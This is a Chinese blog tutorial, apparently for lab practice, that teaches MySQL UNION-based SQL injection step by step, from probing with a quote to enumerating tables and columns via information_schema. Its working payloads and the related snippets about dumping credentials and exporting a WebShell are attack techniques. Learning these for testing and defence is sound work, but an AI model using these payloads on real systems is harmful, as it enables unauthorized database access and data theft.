MySQL之union联合注入

最新推荐文章于 2024-05-29 00:11:31 发布
最新推荐文章于 2024-05-29 00:11:31 发布
阅读量150 收藏
点赞数
文章标签: mysql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_79299101/article/details/132925236
版权

联合查询注入是联合两个表进行联合查询

1,判断是否存在sql注入:通常是id=XXX’输入,看页面是否会报错,如果有报错,则存在sql漏洞。(这是最简单的方法,其他的后面补充)

这是输入XXX的时候

                                                                                                       

当输入XXX'就会有以下反应 

这样就证明了存在漏洞

2,判断注入类型

(1)数字型注入

当输入的参 x 为整型,Sql 语句类型大致如下:select * from <表名> where id = x这种类型可以使用经典的 and 1=1 和 and 1=2 来判断:

在方框里输入 x and 1=1 页面依旧运行正常,继续进行下一步。
 在方框里输入x and 1=2 页面运行错误,则说明此 Sql 注入为数字型注入。

这是因为假如是字符型的话,sql语句为select * from <表名> where id = 'x and 1=1'  没有反应

(2)字符型注入

当输入的参 x 为整型,Sql 语句类型大致如下:select * from <表名> where id = 'x'这样就要用X'and'1'='1和X'and'1'='2来判断了。

和上面同理

3,判断有多少个字段

通常是用XXX' order by 2--+语句

 

这样就证明了,这个库有两个字段数。

4,查询库里的信息

用 vince' union select 1,group_concat(user(),0x3a,database(),0x3a, version())#

这样就可以获得信息了

5,黑盒查询

-1' union select 1,(select TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA=database() limit 1)#

这里为什么要把vince换成-1这样可以避免这样

  information_schema中有三个重要的东西,分别是table,column,schema

tables 表字段 TABLE_SCHEMA 、TABLE_NAME 分别记录着库名和表名

columns 存储该用户创建的所有数据库的库名、标名和字段名。

我们通过-1' union select 1,(select XXX_NAME from information_schema.TABLES where TABLE_SCHEMA=database() limit 1)#

-1' union select 1,((select COLUMN_NAME from information_schema.COLUMNS where TABLE_NAME='XXX' limit 1))#
等来查询

吃花椒地喵酱
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
SQL注入union 联合注入
weixin_53711701的博客
01-16 4329
SQL注入union联合注入
小白学习篇:MYSQL手工注入之多种类多姿势剖析(上)
weixin_64683116的博客
05-21 411
sql手工注入
Web渗透-MySql-Sql注入联合查询注入
最新发布
WolvenSec的博客
05-29 1229
SQL注入(SQL Injection)是一种网络攻击技术,攻击者通过将恶意的SQL代码插入到应用程序的输入字段,从而欺骗应用程序执行未经授权的操作。这种攻击方式可以导致严重的安全问题,包括:数据泄露:攻击者可以未经授权地访问和检索数据库中的敏感数据。数据篡改:攻击者可以修改、删除或添加数据库中的数据。身份冒充:攻击者可以冒充其他用户,包括管理员,从而获得更高的权限。拒绝服务:通过破坏数据库或使其负载过重,使得数据库无法正常提供服务。
Mysql注入联合查询
一个普普通通的博客
03-01 954
Mysql注入联合查询
SQL注入联合查询注入
qq_45691294的博客
07-11 7248
MySQL中的联合查询 联合查询是可合并多个相似的选择查询的结果集。等同于将一个表追加到另一个表,从而实现将两个表的查询组合在一起,使用为此为UNINO或UNION ALL 联合查询:将多个查询的结果合并到一起(纵向合并):字段数不变,多个查询的记录数合并 基本语法: select 语句 union[union选项] select 语句; 联合查询注入的条件 联合查询注入MySQL注入中的一种方式,在SQL注入中说了注入漏洞存在的相关条件,而联合查询注入这种方法需要满足查询的信息在前端有回显,回显数据的
SQL注入漏洞(union + 盲注)
m0_61506558的博客
09-16 1592
数据库漏洞一直处于OWASP前几名,虽然在2021年滑到第三,漏洞的危害是不言而喻的,数据库可以分为两种:关系型数据库:关系型数据库,存储的格式可以直观地反映实体间的关系。关系型数据库和常见的表格比较相似, 关系型数据库中表与表之间是有很多复杂的关联关系的。常见的关系型数据库MySQL,Oracle, PostgreSQL,SQL Server等。
mysql后台注入.zip
04-28
4. **联合查询注入**:攻击者可以注入一个联合查询,将应用程序原本的查询与自己的查询组合在一起,从而获取或修改数据。例如,通过`UNION SELECT`操作,可以读取其他表的数据。 5. **堆叠查询注入**:攻击者可以...
MySQL注入中导出字段内容的研究通过注入导出WebShell
09-14
大家都知道,在MySQL中,无法像MSSQL那样执行script.asp?id=1;insert into table (field) values('angel');--来插入数据,因为MySQL里最多就是用union联合查询。
计算机病毒与防护:MYSQL联合查询上.ppt
06-10
单击此处添加标题 * * * * * * * * * * * * 目录页 MYSQL联合查询上 联合查询注入原理-SQL的union查询 SQL中UNION 操作符用于合并两个或多个 SELECT 语句的结果集。UNION 内部的 SELECT 语句必须拥有相同数量的列。...
sql注入讲解ppt.pptx
08-10
2. 联合查询:使用 UNION keyword 来连接两个查询结果。 3. ORDER BY:使用 ORDER BY keyword 来排序查询结果。 4. LIMIT 和 OFFSET:使用 LIMIT 和 OFFSET keyword 来限制查询结果。 八、SQL 注入基本步骤: 1. ...
MySql手工注入.doc#资源达人分享计划#
08-12
2. **联合查询**:`UNION SELECT`可以用于合并多个查询结果,帮助攻击者获取不同列的数据。例如,`UNION SELECT 1,2,3 FROM table`可以尝试获取不同列的内容。 3. **数据库爆破**:`CONCAT()`函数可以组合字符串,...
sql注入union联合注入_sql注入union
2401_83739411的博客
04-12 736
1、如果都报错,则为整形闭合。2、如果单引号报错,双引号不报错。然后尝试?id=1 –– 无报错则单引号闭合。报错则单引号加括号。3、如果单引号不报错,双引号报错。然后尝试?id=1"––无报错则双引号闭合。报错则双引号加括号。4、判断真值的方法是指通过构造一个条件语句,利用应用程序返回的结果来判断闭合方式如果是没有报错回显的情况,则可以用判断真值的方法来判断闭合方式。例如:输入index.php?id=1’,页面显示错误再输入index.php?id=1’ --+,页面显示正确。
mysql 联合查询注入
broing55的博客
01-07 516
一. dvwa sql注入 low mid high Low 1.输入1提交 2.输入1’提交 3.输入1 and 1=1 提交 4. 输入1 and 1=2 提交 源码: 列数:2 爆个数据库数据库里的表: 表里的表头: 查user和password: 二.medium级别 使用抓包软件bp抓包 当id=1’ ...
Mysql注入
天天学安全专属博客
10-28 4220
mysql注入,包括union注入数据库跨库注入,常见的注入绕过方法和数据库文件读写
MYSQL联合注入
qq_39654116的博客
01-04 256
目录简介特定变量查询步骤Mysql版本<5.0Mysql版本>=5.0注入语句 简介 联合注入是使用了union select联合查询,通常用来拼接在where后面,联合注入的优势是自带多个显位,可以很快爆出数据,缺点是只能用在select最后处,后面如果还有sql语句就必须注释掉。而且必须用到union和select,很容易被拦截 特定变量 1\. SCHEMATA表 : 提供了当前mysql实例中所有数据库的信息。 2\. TABLES 表 : 提供了关于数据库中的表的信息。 3\. C
MySQl联合注入实战
weixin_45118086的博客
03-19 319
MySQl联合注入 一个真.入门级的MySQl联合注入 靶场地址:靶场 目标:拿到管理员账号密码 1、寻找注入点 点击查看新闻,注意URL的变化 可以发现有了一个查询值id=1.于是,开始我们的第一步,探测注入点。 把?之后的数据改为: id = 1 and 1=2 刷新页面之后长这个样子: 2、判断字段数,以用来进行联合注入 借助order by来进行探测,经过探测,可以得知查询的字段数为2 因此,union查询的字段数也应该为2 3、判断回显点 使用这个语句来判断回显点 union select
sql注入——union联合注入
hintll的博客
06-22 1005
sql注入——union联合注入 union注入是sql注入的一大类型 在做有关sql联合注入时一般用以下思路进行解题: 1.首先要找到能与数据库交互的注入点: 2.测试字段的数量,判断SQL语句查询的列数: 在这里我们使用的命理是order by 通常构造:?id=1’ order by sum–+ 和 1’ order by sum# 这里的sum指代的是数字从1开始逐个测试直至3回显有报错为止: ?id=1’ order by 1–+ ?id=1’ order by 2–+ ?id=1’ orde
mysql表之联合查询
09-23
MySQL中,多表联合查询可以使用交叉连接、内连接、外连接、分组查询和子查询等五种方式。交叉连接(CROSS JOIN)是指两个表进行连接,返回的结果是两个表的笛卡尔积。内连接是指根据两个表之间的关联条件,返回满足条件的数据。外连接可以分为左外连接和右外连接,左外连接返回左表的所有数据和满足关联条件的右表数据,右外连接返回右表的所有数据和满足关联条件的左表数据。分组查询是指对查询结果进行分组,然后进行聚合操作。子查询是指在一个查询中嵌套了另一个查询。 在MySQL中,可以使用以下语句进行多表联合查询: 1. 交叉连接(CROSS JOIN): SELECT * FROM table1 CROSS JOIN table2; 2. 内连接: SELECT * FROM table1 INNER JOIN table2 ON table1.column = table2.column; 3. 左外连接: SELECT * FROM table1 LEFT JOIN table2 ON table1.column = table2.column; 4. 右外连接: SELECT * FROM table1 RIGHT JOIN table2 ON table1.column = table2.column; 5. 分组查询: SELECT column1, COUNT(column2) FROM table GROUP BY column1; 6. 子查询: SELECT column1 FROM table1 WHERE column2 IN (SELECT column3 FROM table2);

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值